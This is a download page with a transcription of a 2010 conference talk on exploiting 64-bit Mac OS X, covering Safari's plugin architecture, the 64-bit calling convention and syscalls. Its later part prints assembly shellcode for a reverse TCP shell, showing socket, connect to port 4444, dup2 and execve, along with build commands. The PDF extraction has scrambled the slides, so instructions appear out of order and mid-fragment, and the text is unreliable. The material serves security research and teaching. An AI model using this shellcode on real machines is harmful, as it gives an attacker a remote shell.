Mac OS X Hacking SECURITY ASSESSMENTS

Mac Os X Hacking Security Assessments-Free PDF

  • Date:04 Jun 2020
  • Views:32
  • Downloads:0
  • Pages:81
  • Size:6.63 MB

Share Pdf : Mac Os X Hacking Security Assessments

Download and Preview : Mac Os X Hacking Security Assessments


Report CopyRight/DMCA Form For : Mac Os X Hacking Security Assessments


Transcription:

Former US National Security Agency researcher,First to hack the iPhone and G1 Android phone. Winner of CanSecWest Pwn2Own 2008 2009 2010,Fuzzing for Software Security Testing and Quality. The Mac Hacker s Handbook,PhD CISSP GCFA etc,Wednesday December 15 2010. About this talk,The Mac Hackers Handbook came out in March 2009. and covered Tiger and Leopard,That summer Snow Leopard came out and broke.
many of the examples, This talk covers those differences and how to still. exploit Macs,Wednesday December 15 2010,Background. Fun with 64 bit applications,Sandboxing,Topics in Heap overflows. Wednesday December 15 2010,Many processes are now 64 bit. Some older macs circa 2007 are different,By default kernel is still 32 bit.
Darwin Charlie Millers Computer local 10 4 0 Darwin. Kernel Version 10 4 0 Fri Apr 23 18 28 53 PDT,2010 root xnu 1504 7 4 1 RELEASE I386 i386. Wednesday December 15 2010,64 bit processes mostly. Wednesday December 15 2010,Older macs all 32 bit,Wednesday December 15 2010. Safari newer macs,Safari is 64 bit,32 bit plugins are managed by WebKitPluginAgent. Plugins may be either 32 or 64 bit usually 32,64 bit plugins Java are in Safari s address space.
27097 dr System Library Frameworks WebKit framework WebKitPluginAgent. 27106 dr System Library Frameworks WebKit framework WebKitPluginHost app Contents MacOS WebKitPluginHost. 27345 dr System Library Frameworks WebKit framework WebKitPluginHost app Contents MacOS WebKitPluginHost. Wednesday December 15 2010,Crash resiliency,Wednesday December 15 2010. Older macs,and users who launch Safari under 32 bit. Plugins run within Safari s 32 bit address space,TEXT 00001000 0052b000 5288K r x rwx SM COW. Applications Safari app Contents MacOS Safari,TEXT 19dcb000 1a50b000 7424K r x rwx SM COW. Users cmiller Library Internet Plug Ins Flash Player plugin. Contents MacOS Flash Player,Wednesday December 15 2010.
64 bit calling conventions,Mac OS X uses the System V Application Binary. Interface AMD64 Architecture Processor Suppliment,Arguments passed in rdi rsi rdx rcx r8 r9. or stack if more than that or larger than register. rbx rsp rbp r12 r15 are preserved across function,rax contains first return value rdx second. Wednesday December 15 2010,System calls,syscall number in rax 0x2000000. rcx will be clobbered save it if you want,arguments in registers like calling function.
use syscall instruction,INT 0x80 can only pass 32 bit values. According to FreeBSD mailing list,Wednesday December 15 2010. x86 shellcode doesn t typically work,For example no metasploit Mac OS X shellcode. works on x86 64,Only public x86 64 OS X shellcode is from fjserna. Connect shellcode contains NULL s,Wednesday December 15 2010.
osx x86 shell reverse tcp,Stack is 64 bit code expects 32. 0x7fff5fbffa58 0x5c1102ff 0x00000000 0x0100007f 0x00000000. push 0x100007f,push 0x5c1102ff,mov edi esp,xor eax eax. push 0x1 Wrong calling convention,mov al 0x61,Wrong syscall number. int 80 used,instead of,Wednesday December 15 2010,SECTION text. GLOBAL start,socket 0x2000061,Cleaner and smaller version of that.
xor rdi rdi,mov rsi rdi,shellcode 120 bytes,xor rdx rdx. mov eax 0x2000061,connect 0x2000062,mov rdi rax,lea rsi rel sockaddr in. Compare with,xor rdx rdx,mov dl 0x10,mov eax 0x2000062. osx x86 shell reverse tcp 65 bytes mov r12 3,xor rsi rsi. fjserna s was 165 bytes,dup2 0x200005a,mov eax 0x200005a.
execve 0x200003b,lea rdi rel cmd,xor rdx rdx,Compile with. mov rsi rsp,mov eax 0x200003b,usr bin nasm fmacho64 connect s exit 0x2000001. ld e start o connect connect o exit,mov eax 0x2000001. section data,sockaddr in,dd 0x5c110200 port 4444,dd 0x0100007f 127 0 0 1. Mac OS X uses the System V Application Binary Interface AMD64 Architecture Processor Suppliment Arguments passed in rdi rsi rdx rcx r8 r9 or stack if more than that or larger than register rbx rsp rbp r12 r15 are preserved across function calls rax contains rst return value rdx second Wednesday December 15 2010 System calls syscall number in rax 0x2000000 rcx will be

Related Books